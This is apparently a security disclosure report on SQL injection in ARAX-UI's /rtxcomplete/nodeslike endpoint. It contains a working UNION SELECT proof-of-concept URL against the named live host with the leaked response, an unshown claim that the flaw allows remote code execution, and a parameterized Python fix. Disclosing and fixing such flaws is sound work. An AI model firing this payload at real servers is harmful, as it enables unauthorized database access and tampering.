The /rtxcomplete/nodeslike endpoint of the ARAX-UI application at https://arax.rtx.ai is vulnerable to SQL injection. A malicious SQL payload placed in the word query parameter of this endpoint would allow an attacker to dump the database, modify data, or delete data. In addition, it is possible to take over the server hosting the application completely by achieving remote code execution through this vulnerability.
Steps to reproduce: perform a GET request to
https://arax.rtx.ai/rtxcomplete/nodeslike?word=test\" UNION SELECT sqlite_version()---&limit=15&callback=jQuery33105838363973705006_1650064361901&_=1650064362018
The server returns JSON in the HTTP response, with the SQLite version "3.11.0" as the name field of the first item in the array:
jQuery33105838363973705006_1650064361901([{"curie": "??", "name": "3.11.0", "type": "??"}, {"curie": "??", "name": "Testa-C", "type": "??"}, {"curie": "??", "name": "testacea group", "type": "??"}, {"curie": "??", "name": "Testacella", "type": "??"}, {"curie": "??", "name": "Testacella haliotidea", "type": "??"}, {"curie": "??", "name": "Testacella maugei", "type": "??"}, {"curie": "??", "name": "Testacella scutulum", "type": "??"}, {"curie": "??", "name": "Testacella sp. NMW.Z", "type": "??"}, {"curie": "??", "name": "Testacellidae", "type": "??"}, {"curie": "??", "name": "testase 4, human", "type": "??"}, {"curie": "??", "name": "Testate", "type": "??"}, {"curie": "??", "name": "Testechiniscus", "type": "??"}, {"curie": "??", "name": "Testechiniscus spitsbergensis", "type": "??"}, {"curie": "??", "name": "tested for", "type": "??"}, {"curie": "??", "name": "Tested for HIV", "type": "??"}]);
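The injected version string appears in the name field because the word parameter is spliced into the SQL text, so the closing quote and UNION become part of the statement. The fix is to bind the value as a parameter and to escape LIKE wildcards so that user input is only ever matched literally. The following is an added, illustrative hardened handler written for this report; it is not ARAX code, and the table name nodes, its three columns, the use of Python's sqlite3 module, and the sample rows are all assumptions constructed here for demonstration.

```python
import sqlite3

# Constructed sample rows standing in for the ARAX node-name table
# (the real schema is not known; this shape mirrors the JSON fields in the response).
SAMPLE_NODES = [
    ("??", "Testa-C", "??"),
    ("??", "testacea group", "??"),
    ("??", "Testacella", "??"),
    ("??", "Tested for HIV", "??"),
    ("??", "Tetanus", "??"),
]

DEFAULT_LIMIT = 15
MAX_LIMIT = 100


def build_db():
    """Create an in-memory SQLite database with the constructed sample rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE nodes (curie TEXT, name TEXT, type TEXT)")
    conn.executemany("INSERT INTO nodes VALUES (?, ?, ?)", SAMPLE_NODES)
    conn.commit()
    return conn


def escape_like(word):
    """Escape LIKE metacharacters so the user's text is matched literally.

    Backslash is used as the ESCAPE character in the query below, so it must
    itself be escaped first, then the two wildcards % and _.
    """
    return word.replace("\\", "\\\\").replace("%", "\\%").replace("_", "\\_")


def clamp_limit(raw_limit):
    """Coerce the limit parameter to an integer within [1, MAX_LIMIT]."""
    try:
        value = int(raw_limit)
    except (TypeError, ValueError):
        value = DEFAULT_LIMIT
    return max(1, min(value, MAX_LIMIT))


def nodes_like(conn, word, limit=DEFAULT_LIMIT):
    """Prefix search on node names with the user value bound as a parameter.

    The SQL text is a fixed string; the pattern and limit travel as bound
    parameters, so a quote or UNION inside `word` never reaches the parser.
    """
    sql = (
        "SELECT curie, name, type FROM nodes "
        "WHERE name LIKE ? ESCAPE '\\' "
        "LIMIT ?"
    )
    pattern = escape_like(word) + "%"
    rows = conn.execute(sql, (pattern, clamp_limit(limit))).fetchall()
    return [{"curie": c, "name": n, "type": t} for c, n, t in rows]


if __name__ == "__main__":
    db = build_db()
    # Ordinary prefix query (SQLite LIKE is case-insensitive for ASCII).
    print(nodes_like(db, "test"))
    # The payload from the report is now just an unusual literal prefix; no row matches.
    print(nodes_like(db, 'test" UNION SELECT sqlite_version()--'))
```

With the parameterized query, the same request that previously returned "3.11.0" yields an empty result set, and a bare "%" in word no longer matches every row because the wildcard is escaped.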